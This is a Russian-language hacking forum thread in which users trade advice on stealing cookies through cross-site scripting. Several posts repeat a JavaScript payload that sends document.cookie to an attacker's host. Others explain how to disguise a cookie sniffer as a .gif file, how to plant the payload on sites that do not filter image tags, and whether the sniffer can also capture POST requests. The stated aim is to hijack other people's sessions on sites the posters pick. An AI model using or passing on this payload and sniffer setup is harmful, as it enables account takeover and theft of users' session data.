:cheezy::cheezy:
Цитата:

Сообщение от DNSrus

А когда подставляешь код в принтабельное поле то этот текст нужно отправлять или только написав открывать исходный код?

нужно отправлять! :cheezy:

Цитата:

Сообщение от DNSrus

ну я так и думал =)

https://forum.antichat.ru/thread20140.html

Цитата:

Сообщение от DNSrus

а еще вопрос если код выглядит так </script>alert('XSS')<script>
это значит что его отфильтровали и ничего нельзя сделать?

если отфильтровало функцией htmlspecialchars(), то ничего ни сделаешь!!!

Попробовал заливать код в картинку но ничего не выходит:

Цитата:



img = new Image();
img.src = "http://yourhost.com/s.gif?"+document.cookie;




Ссылку изменяю на свою как нужно, на локальном сервере и многих других хостингах браузер показывает "поломанную" картинку, можете дать 100% рабочий пример? (файлы)

Цитата:

Сообщение от gangsta15

Попробовал заливать код в картинку но ничего не выходит:

Ссылку изменяю на свою как нужно, на локальном сервере и многих других хостингах браузер показывает "поломанную" картинку, можете дать 100% рабочий пример? (файлы)

Браузер показывает поломанную картинку потому что это текстовый документ

вот как происходит на деле!

ну что же обьясню по порядку
во-первых создаешь просто текстовый документ
2) переимновываешь его в расширение .GIF
пример s.gif ( или какой хочешь )

3) после настраиваешь ксс под твой снифф )))

вот и все

если что то не понятно пиши

Цитата:

Сообщение от sulikoshka

Браузер показывает поломанную картинку потому что это текстовый документ

вот как происходит на деле!

ну что же обьясню по порядку
во-первых создаешь просто текстовый документ
2) переимновываешь его в расширение .GIF
пример s.gif ( или какой хочешь )

3) после настраиваешь ксс под твой снифф )))

вот и все

если что то не понятно пиши

смотри) у меня есть сниффер замаскированный под картинку
s.gif

Цитата:






так же тот файл (которое мазахакер описывал) со следующим содержанием
img.gif

Цитата:



img = new Image();
img.src = "http://site/s.gif?"+document.cookie;




Так вот последний я хочу вставить на какой нибудь нужный мне сайт где изображения не обрабатываются ([img][/img]) и чтобы как описывал мазахакер, когда оно подгружаться будет - в нем будет выполняться тот код

Цитата:



img = new Image();
img.src = "http://site/s.gif?"+document.cookie;




И так на мой сниффер (s.gif) будут приходить куки, но когда я вставляю этот файл (img.gif) он отображается "поломанной картинкой" т.е. ничего не подгружается и куков он не посылает =)

P.S. Наверное запутал) Я вообще правильно понял тот способ что описывал мазахакер? (последний "абзац" в первом посте)

Извиняюсь конечно, но тут есть сведения, что способ не ахти какой рабочий... T_T но вобоще попробуй вместо .gif картинки юзать .php

vonkolot, не проще ли для перехвата POST-запроса использовать скрипт, аналогичный тому, который записывает данные с фейка? Суть та же самая =)

у меня вопрос...пользуюсь этим снифером с начала создания темы...но как то не приходилось встречаться с POST запросами..Можно ли перехватывать этим сниффером POST запросы??